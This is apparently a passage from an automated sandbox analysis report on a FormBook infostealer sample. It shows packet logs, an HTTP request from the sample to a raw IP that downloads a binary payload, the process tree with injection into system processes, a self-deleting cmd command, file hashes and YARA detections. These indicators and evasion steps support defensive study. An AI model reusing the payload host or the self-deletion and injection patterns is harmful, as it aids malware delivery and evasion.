Nov 19, 2020 10:50:01.525922060 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525938034 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525955915 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525955915 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.525996923 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.526000977 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.526007891 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.526009083 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.526026964 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.526060104 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.526097059 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.526108027 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.526155949 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.526177883 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.526223898 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.526320934 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.526366949 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.553169966 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.553255081 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.841959953 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.841984034 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842006922 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842037916 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842037916 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842051029 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842062950 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842067003 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842117071 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842133999 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842134953 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842181921 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842197895 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842242956 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842279911 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842295885 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842328072 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842351913 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842363119 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842407942 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.842443943 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.842494965 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:02.158025980 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158051014 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158068895 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158085108 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158101082 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158121109 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158139944 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158155918 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158174038 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158181906 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:02.158190966 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158209085 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158226013 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158242941 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158263922 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158279896 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:02.158282042 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158301115 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158318996 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158354044 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:02.158374071 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158417940 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:02.158487082 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:02.158524990 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158545017 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158564091 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158581018 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158598900 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158612967 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:02.158642054 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158658981 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:02.158679962 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4

                        HTTP Request Dependency Graph

                        • 103.125.191.5

                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49756 | 103.125.191.5 | 80 | C:\Users\user\Desktop\2eD17GZuWs.exe
Timestamp | kBytes transferred | Direction | Data
Nov 19, 2020 10:49:58.574579954 CET | 5396 | OUT | GET /bin_xMjelaYnr43.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: 103.125.191.5
                        Cache-Control: no-cache
Nov 19, 2020 10:49:58.891490936 CET | 5397 | IN | HTTP/1.1 200 OK
                        Date: Thu, 19 Nov 2020 09:49:57 GMT
                        Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                        Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                        ETag: "2d640-5b4682e21b662"
                        Accept-Ranges: bytes
                        Content-Length: 185920
                        Content-Type: application/octet-stream


                        Code Manipulations

                        Statistics

                        Behavior


                        System Behavior

                        General

                        Start time:10:48:23
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Visual Basic
                        Reputation:low

                        General

                        Start time:10:48:34
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:10:50:04
                        Start date:19/11/2020
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\autofmt.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                        Imagebase:0x1150000
                        File size:831488 bytes
                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                        Imagebase:0x1240000
                        File size:59904 bytes
                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, Author: Florian Roth
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:10:50:26
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:50:27
                        Start date:19/11/2020
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
